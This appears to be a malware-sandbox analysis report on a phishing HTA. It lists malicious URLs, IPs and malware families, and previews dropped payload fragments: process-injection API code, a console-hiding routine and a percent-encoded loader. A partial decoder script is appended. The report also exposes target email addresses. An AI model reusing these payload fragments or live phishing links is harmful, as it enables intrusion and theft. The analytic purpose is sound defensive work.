CLOUDFLARENETUS | https://analytics-prd.aws.wehaa.net/trackings?value=1&action=click&category=external&origin=detailpage&url=http://notifix.info/scales/ec49f59be146f69f3ea00c211d5cccd90524b2cf7f8aec665534fc020c910734b9e18d0945bd518a0e55b407c5bf7443cf6179/paige_williams@newyorker.com&cat=firstpage&label_item_id=9633&label_owner_id=646&label_url=http://notifix.info/scales/ec49f59be146f69f3ea00c211d5cccd90524b2cf7f8aec665534fc020c910734b9e18d0945bd518a0e55b407c5bf7443cf6179/paige_williams@newyorker.com&idle=8d15bf95831b32126e4b3bd02a20cf592eade0e3442422aeaf0db14b2e91ae186a5549c468519863594ece59910ee541&tenant=minnesotastate.jobs | malicious | Captcha Phish | 104.21.80.1
CLOUDFLARENETUS | https://analytics-prd.aws.wehaa.net/trackings?value=1&action=click&category=external&origin=detailpage&url=http://notifix.info/scales/0af634fca2eaf3a11c0597691f5616c7d16f5580d650d17201024b374ebe92a8e0c492c822b6be6f4332bb93acc2ba02298f78/christa_sgobba@condenast.com&cat=firstpage&label_item_id=9633&label_owner_id=646&label_url=http://notifix.info/scales/0af634fca2eaf3a11c0597691f5616c7d16f5580d650d17201024b374ebe92a8e0c492c822b6be6f4332bb93acc2ba02298f78/christa_sgobba@condenast.com&idle=8d15bf95831b32126e4b3bd02a20cf592eade0e3442422aeaf0db14b2e91ae186a5549c468519863594ece59910ee541&tenant=minnesotastate.jobs | malicious | Captcha Phish, HTMLPhisher | 172.67.157.142
CLOUDFLARENETUS | REMITTANCE_10023Tdcj.html | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | phish_alert_iocp_v1.4.48 - 2024-12-11T151927.331.eml | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | 172.67.176.240
CLOUDFLARENETUS | jew.ppc.elf | malicious | Unknown | 104.16.155.85
CLOUDFLARENETUS | Shipping Documents.exe | malicious | MassLogger RAT | 104.21.67.152
CLOUDFLARENETUS | https://newdocumentsproposal.webflow.io/ | malicious | Captcha Phish, HTMLPhisher | 172.64.151.8
CLOUDFLARENETUS | x86_64.elf | malicious | Mirai | 104.31.160.246
RACKMARKTES | file.exe | malicious | PureCrypter | 185.226.181.36
RACKMARKTES | file.exe | malicious | PureCrypter | 185.226.181.36
RACKMARKTES | vOoy27ZG1Y.msi | malicious | Unknown | 185.228.72.101
RACKMARKTES | Aqua.x86.elf | malicious | Unknown | 45.147.248.7
RACKMARKTES | Aqua.arm7.elf | malicious | Mirai | 45.147.248.7
RACKMARKTES | 6.HTA.hta | malicious | Unknown | 185.228.72.84
RACKMARKTES | x86_64-20231212-1319.elf | malicious | Mirai | 185.214.108.250
RACKMARKTES | Adobe_Acrobate_Reader_Pro-HAv70.msi | malicious | Metamorfo | 185.228.72.212
RACKMARKTES | Word_comprob_33690014194.HTA | malicious | Unknown | 185.228.72.84
RACKMARKTES | ReF_comprobante_85523364312723157089271.HTA.hta | malicious | Unknown | 185.228.72.84
FREE-NET-ASFREEnetEU | EBUdultKh7.exe | malicious | LummaC Stealer | 147.45.44.131
FREE-NET-ASFREEnetEU | arm5.elf | malicious | Unknown | 193.233.202.23
FREE-NET-ASFREEnetEU | Wh2c6sgwRo.exe | malicious | DCRat, PureLog Stealer, zgRAT | 147.45.47.151
FREE-NET-ASFREEnetEU | installer.exe | malicious | Unknown | 193.233.254.0
FREE-NET-ASFREEnetEU | installer.exe | malicious | Unknown | 193.233.254.0
FREE-NET-ASFREEnetEU | MiJZ3z4t5K.exe | malicious | Unknown | 147.45.44.131
FREE-NET-ASFREEnetEU | tyhkamwdmrg.exe | malicious | LummaC Stealer | 147.45.47.81
FREE-NET-ASFREEnetEU | kyhjasehs.exe | malicious | DCRat | 147.45.47.156
FREE-NET-ASFREEnetEU | fkydjyhjadg.exe | malicious | LummaC Stealer | 147.45.47.81
FREE-NET-ASFREEnetEU | KBKHHYI29L.msi | malicious | Amadey | 147.45.47.167
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | FSCPlugin06.exe | malicious | LummaC Stealer | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | freebienotes.exe | malicious | LummaC Stealer | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | FreebieNotes.exe | malicious | LummaC Stealer | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | FreebieNotes.exe | malicious | LummaC Stealer | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | FreebieNotes.exe | malicious | LummaC Stealer | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | xeroxscan.Docx | malicious | Unknown | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | EBUdultKh7.exe | malicious | LummaC Stealer | 172.67.206.64
                                                                      No context
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):1.3073548855100423
                                                                      Encrypted:false
                                                                      SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr5:KooCEYhgYEL0In
                                                                      MD5:31E7CFD20C06EFDFFEB5AE3D2AE18E29
                                                                      SHA1:DD3CD32810F111A82DA41A6ED7487F79ACAF55CD
                                                                      SHA-256:BED0562E4E768D25CA5EDAF597CC7CEA3B9984C8F0914FD8262DB59786DB921A
                                                                      SHA-512:7881888FF9A949C860C69718BC8C4BE83726D59060312C70D196BEC85400A505C3D751F40C9A5DB337A5149E35033CA994DAA28898C166FF176A478F2DF57334
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa0e1ccf8, page size 16384, DirtyShutdown, Windows version 10.0
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.42215881938694255
                                                                      Encrypted:false
                                                                      SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                      MD5:510F24F9F305E24A866F047B4D138FC4
                                                                      SHA1:F3042505CD10A8C6CBE68F8232250C5FC2F2507D
                                                                      SHA-256:A628896627EED6403DCC38C2B4CFFC8E67C87FAB7D942D1C69918E6902B68B5D
                                                                      SHA-512:C6122803F3C4429EB3885CCC0B6D31CC8F9ECC7B8F0120254F217FC669F0C5A2B4718AEB98704E5EFCF7623C09573C0F7217DC29B0BAB049F06348CC640CF646
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.07661025767302912
                                                                      Encrypted:false
                                                                      SSDEEP:3:zlyYeQT3zuhajn13a/01RjpellAllcVO/lnlZMxZNQl:zlyzySha53qOY/AOewk
                                                                      MD5:DEEFAABB7698FC7EC8F5CD9BC897F376
                                                                      SHA1:9968554939065B1FC45DB420DA225DFAEBB1027A
                                                                      SHA-256:8C0C222864838BDC546D9B16A8ABB4A09F68138CF9D412B31E1D3A50079FD8FA
                                                                      SHA-512:B3231603AFCB4326F8559C10DAF3D119D37EF4DC7BAFC5DA7C222C3534C8BC02709BD52BF6CB8A56C981A64F84CA4B945448891B8999B8AA320E36FA4B76BF28
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1510207563435464
                                                                      Encrypted:false
                                                                      SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                      MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                      SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                      SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                      SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):484
                                                                      Entropy (8bit):4.844739520818714
                                                                      Encrypted:false
                                                                      SSDEEP:6:V/DsDrSW/eM/s62SRbXFWx/1XQM/s62SRvoSok2SRyE2SxYqdYnm4cwCS+en:V/DGr7TDbVW91XdDvoOcuYnmiCM
                                                                      MD5:FEFBA9C7AE0D93708317C3D74298F4FF
                                                                      SHA1:92FB7CD5FA4B3E885906E7863783D899ED777FEB
                                                                      SHA-256:7E7246D00754EB5C87A1296D7031FA401C217F74E3FAA4954E5D1E0B63DE0EC6
                                                                      SHA-512:5CC1E0F1974CAD1B34463C2EDFC49FE637E57EE78C441CCE6ACA3C0B11C2C3876A8D0BB39B38BE0AF434B5122F5015AAD4597FEE44F80624ABD9BC56266C0B9B
                                                                      Malicious:false
                                                                      Preview:.using System;..using System.Runtime.InteropServices;..public class Window {.. [DllImport("user32.dll")].. public static extern int FindWindow(string lpClassName, string lpWindowName);.. [DllImport("user32.dll")].. public static extern int ShowWindow(int hwnd, int nCmdShow);.. public static extern bool IsWindowVisible(int hwnd);.. public static void HideConsole() {.. var handle = FindWindow(null, Console.Title);.. ShowWindow(handle, 0);.. }..}
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):369
                                                                      Entropy (8bit):5.288318049323857
                                                                      Encrypted:false
                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fy5Zzxs7+AEszIwkn23fy5E:p37Lvkmb6KRfq5ZWZEifq5E
                                                                      MD5:664BE2B6E5F336546B873F8C7A296DB6
                                                                      SHA1:4B1CFC96197E2110250BD42D14A0B1C4E88B557F
                                                                      SHA-256:DBEBDDE021D35D661247E015B26C18DBC6693AF0A86B5F962E8BD589EFABCE9A
                                                                      SHA-512:03E9DA19CDEF3808FF642F348DCE5093AC7F0871E5E55741229D08B54DA1DC8549D1714688D492C5282E5BFBC7FFD2966E1815EFE3D685862B071F5B27CD195D
                                                                      Malicious:true
                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.0.cs"
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                      Category:modified
                                                                      Size (bytes):1150
                                                                      Entropy (8bit):5.295363871114836
                                                                      Encrypted:false
                                                                      SSDEEP:24:KJBqd3ka6KRfq5+Eifq5RKax5DqBVKVrdFAMBJTrfq5lX4gFG8s4:Cika6CNEu8K2DcVKdBJXWXFFG8s4
                                                                      MD5:E6947604B894C5EAA23492DEE8B06D41
                                                                      SHA1:2BABA680E7335112E28D1E46EDF0DF7ADEEF73DF
                                                                      SHA-256:8EC5B1E48792CC071132B12AFA6C2D862D4D14AFAB0C61B93CB42D65033EFE24
                                                                      SHA-512:C3A3A99D63D84129C8E3DF97AF20B9790FB12492082299ACCE2A824AAD45464F5D9619821860BE3D87D7BCA9E391A3D646142FE69E98FAD37E9137F55DA596B8
                                                                      Malicious:false
                                                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....c:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.0.cs(8,31): error CS0626: Warning as Error: Method, operator, or accessor 'Window
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Dec 12 08:24:32 2024, 1st section name ".debug$S"
                                                                      Category:dropped
                                                                      Size (bytes):1328
                                                                      Entropy (8bit):3.9819372239571758
                                                                      Encrypted:false
                                                                      SSDEEP:24:HAe9E2+fTfZrXDfHKwKEbsmfII+ycuZhN2akS+PNnqSqd:eLtzBKPmg1ul2a3iqSK
                                                                      MD5:4F1A235936F1E816D549903F107550D7
                                                                      SHA1:9590612DE33FA0DA1CAA36ED7E78223D2B3EBC0A
                                                                      SHA-256:8C81ECB0FC3D15CFD6939CE7E811127813A71E75ADFB0EAAF4F80C90358E18C4
                                                                      SHA-512:2FF49637E6CC4EC9F0C71E2CC19F46EE3B2438F56B57C1539D51E140415E2B0FECF99CD13F58028E2D7CD708E9E27EFF92B72CF2678B17F833EEC1DF4B5A8F56
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                      File Type:MSVC .res
                                                                      Category:dropped
                                                                      Size (bytes):652
                                                                      Entropy (8bit):3.101053862247401
                                                                      Encrypted:false
                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryYak7Ynqq+PN5Dlq5J:+RI+ycuZhN2akS+PNnqX
                                                                      MD5:F862E8A16CFE68E503F3DFAAFCC06672
                                                                      SHA1:90AE4916F70ADCC930556C158A195D662090225D
                                                                      SHA-256:8286BAE78E44E507A6065DC96A55E6543B9F11F8C769A3DB46F62186DE31B69A
                                                                      SHA-512:39F17BA3F195B594E83556BAECB27B7EDE4939AEA48707B1D927E1C430CCF44DB2C1FF57FBDCD5B5E4F22C9A0C6E1B1FA77EBD9CBB6EBA7729B46761E9C5DF14
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):10583
                                                                      Entropy (8bit):4.487855797297623
                                                                      Encrypted:false
                                                                      SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                                      MD5:B022C6FE4494666C8337A975D175C726
                                                                      SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                                      SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                                      SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                                      Malicious:true
                                                                      Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):204
                                                                      Entropy (8bit):4.986393702798858
                                                                      Encrypted:false
                                                                      SSDEEP:6:pAu+H2L/6K2wkn23f93KzxszIwkn23f93v:p37L/6KRfcQf5
                                                                      MD5:40E45D3A59F120820C80EC3129BA45C8
                                                                      SHA1:D746B7B0A912B864642FF5FF830E39A64D608117
                                                                      SHA-256:38FBCC20202C4BB24E8A82CF42DDB755EBC606EB563011C5BC7779948748A780
                                                                      SHA-512:BD2D246A26CCDD13C339865BDBB111E2A2C322AA090A60FBA2B7422030E5146277D26EE4BEEEAF46B82007B58C5ED3DEAC4D10EA2811621BB9D21A9BDD5CADBB
                                                                      Malicious:false
                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.0.cs"
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):8704
                                                                      Entropy (8bit):4.661460379399688
                                                                      Encrypted:false
                                                                      SSDEEP:96:lbuaQZGQf9xPQ2pCa/u67hHJE9IhbpPrjzKcaEZREH0ljILHqrv5MqwTzeNc+iIK:lCaQHf9WDa/u6dRj2cafUxd5Mq6eNc1
                                                                      MD5:296317C64DDD89AA2B97B9E7F50CDC60
                                                                      SHA1:77105F276F589F6466A2F3B27495F2F48932EC73
                                                                      SHA-256:628528FB969009998893E32C20678EC4B99D6D6C05E9EDBBC3469C8EC87627CA
                                                                      SHA-512:2FC3969047FCC5F8AE30DE03F2CEA07548D22C07AEE83A02CBDD620B6C8472CC9896FC8B26FA87182BDE5B1320DF41C399A7AEAB03E5B2722B54E3A45DE91CD4
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                      Category:modified
                                                                      Size (bytes):702
                                                                      Entropy (8bit):5.235845692198278
                                                                      Encrypted:false
                                                                      SSDEEP:12:KJN/qR37L/6KRfcQf8KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfff8Kax5DqBVKVrdFAMBJTH
                                                                      MD5:1A7A56218AABF67B9CEFFC649DDF02BB
                                                                      SHA1:3EFB5D0134252A3E84C0CF53E381958BABB397D7
                                                                      SHA-256:AAB3CB57773403D22E6818E543738905395E334C86DD2EB585ABEA1D3A1B801E
                                                                      SHA-512:FAC1A4C1E9C133E3D752A49CDBB74D37BB3133CFE4399BD91E09ADF7D60AB76356CF8D8DC6D34A0ED04976C77C6B4E70343F6A9E532E7D88CBFFD7549B956FD1
                                                                      Malicious:false
                                                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6221
                                                                      Entropy (8bit):3.7272031940937937
                                                                      Encrypted:false
                                                                      SSDEEP:96:VNas33CxH5HkvhkvCCtHr0YdLXHYr0YdLXH5:vasyZLHr0YdLor0YdLp
                                                                      MD5:1511AD7C083001C0E8791E7D4DC475C1
                                                                      SHA1:BE804C1F7A1790C7C7A7DA3AFCEDD81DC34F8CAC
                                                                      SHA-256:D0232C6769F461799F8C920B46C9735C5FD4C3D0BB09EE4DBD98F7CD4A7A749D
                                                                      SHA-512:E9361B4040279DE5950166AB029CF7CC1CC828F1CE4F64CCAB5E3218A671E9B4572D0E5EFC91BBB3CF14DD88C35DEF5688674BFDCB6077CFC6EC1D7E72FBD338
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....N.TbL..o..YbL......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Yy6...........................%..A.p.p.D.a.t.a...B.V.1......Y|6..Roaming.@......CW.^.Y|6...........................zm.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`...........................W0.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6221
                                                                      Entropy (8bit):3.7272031940937937
                                                                      Encrypted:false
                                                                      SSDEEP:96:VNas33CxH5HkvhkvCCtHr0YdLXHYr0YdLXH5:vasyZLHr0YdLor0YdLp
                                                                      MD5:1511AD7C083001C0E8791E7D4DC475C1
                                                                      SHA1:BE804C1F7A1790C7C7A7DA3AFCEDD81DC34F8CAC
                                                                      SHA-256:D0232C6769F461799F8C920B46C9735C5FD4C3D0BB09EE4DBD98F7CD4A7A749D
                                                                      SHA-512:E9361B4040279DE5950166AB029CF7CC1CC828F1CE4F64CCAB5E3218A671E9B4572D0E5EFC91BBB3CF14DD88C35DEF5688674BFDCB6077CFC6EC1D7E72FBD338
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....N.TbL..o..YbL......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Yy6...........................%..A.p.p.D.a.t.a...B.V.1......Y|6..Roaming.@......CW.^.Y|6...........................zm.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`...........................W0.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):55
                                                                      Entropy (8bit):4.306461250274409
                                                                      Encrypted:false
                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                      Malicious:false
                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                      File type:HTML document, ASCII text, with very long lines (1004), with CRLF line terminators
                                                                      Entropy (8bit):3.733889945504831
                                                                      TrID:
                                                                        File name:Captcha.hta
                                                                        File size:1'047 bytes
                                                                        MD5:21bd78bbc50aa0b32d6e8d1868e9ad5e
                                                                        SHA1:8a4278d077fa472fd6e4cbde95e6a3b928eff10b
                                                                        SHA256:a5a7a72decc3a1f9bb2e0c39269f9660051a3a40c34f87789e33995b9dd2b9e1
                                                                        SHA512:3d088b7ff90f722223fe2cef2bd65b8df3fdcaa92fe14f46b8c1f2b9ee0c3c1c94cff2ca02acf9619ffa372db4565fc1b576fd553e928ebf6d94238b86eace0e
                                                                        SSDEEP:12:Sr70d76S0poWsM23WhXKREC8PJtAT+mLAsg2TpY7OVyhFSM+M2GRYAFPcR1b:q0d+2UVKR5ST5d6yGMmAWR1b
                                                                        TLSH:0B11A37C6522D4CDAD337D7BECA46B20D2189E03E8D463C4485580852FE1579B5543DA
                                                                        File Content Preview:<script language="javascript">..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%20%20%20%20%20%20%20%20%76%61%72%20%73%68%65%6C
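The first stage of Captcha.hta is a single `document.write(unescape('%3C%68...'))` call, so the real script only exists after the percent-encoding is undone. The following is an added example, not code from the Joe Sandbox report: a small static decoder that emulates JavaScript's legacy `unescape()` (per-byte `%XX` and `%uXXXX`, no UTF-8 reassembly, which is where `urllib.parse.unquote` would differ) and flags script-host tokens in the result. The sample input is the truncated File Content Preview above, with the report's `..` rendered as the CRLF the file type line says it has; because the preview is cut off, the decoded output stops at `var shel`. The `js_escape` helper and the token list are this example's own.

```python
"""
Statically decode the first stage of a percent-encoded HTA such as Captcha.hta.

Added example; not part of the Joe Sandbox report. HTA_PREVIEW is the report's
truncated File Content Preview, so the decoded text stops where it stops.
"""
import re

# Constructed from the report's preview: the ".." between the two lines is the
# CRLF terminator the file-type line mentions; the unescape() argument is cut off.
HTA_PREVIEW = (
    '<script language="javascript">\r\n'
    "document.write(unescape('"
    "%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20"
    "%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F"
    "%6A%61%76%61%73%63%72%69%70%74%22%3E%0A"
    "%20%20%20%20%20%20%20%20%76%61%72%20%73%68%65%6C"
)

TOKEN_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
# String literal handed to unescape(); a missing closing quote (truncated
# preview) is accepted and the literal runs to end of input.
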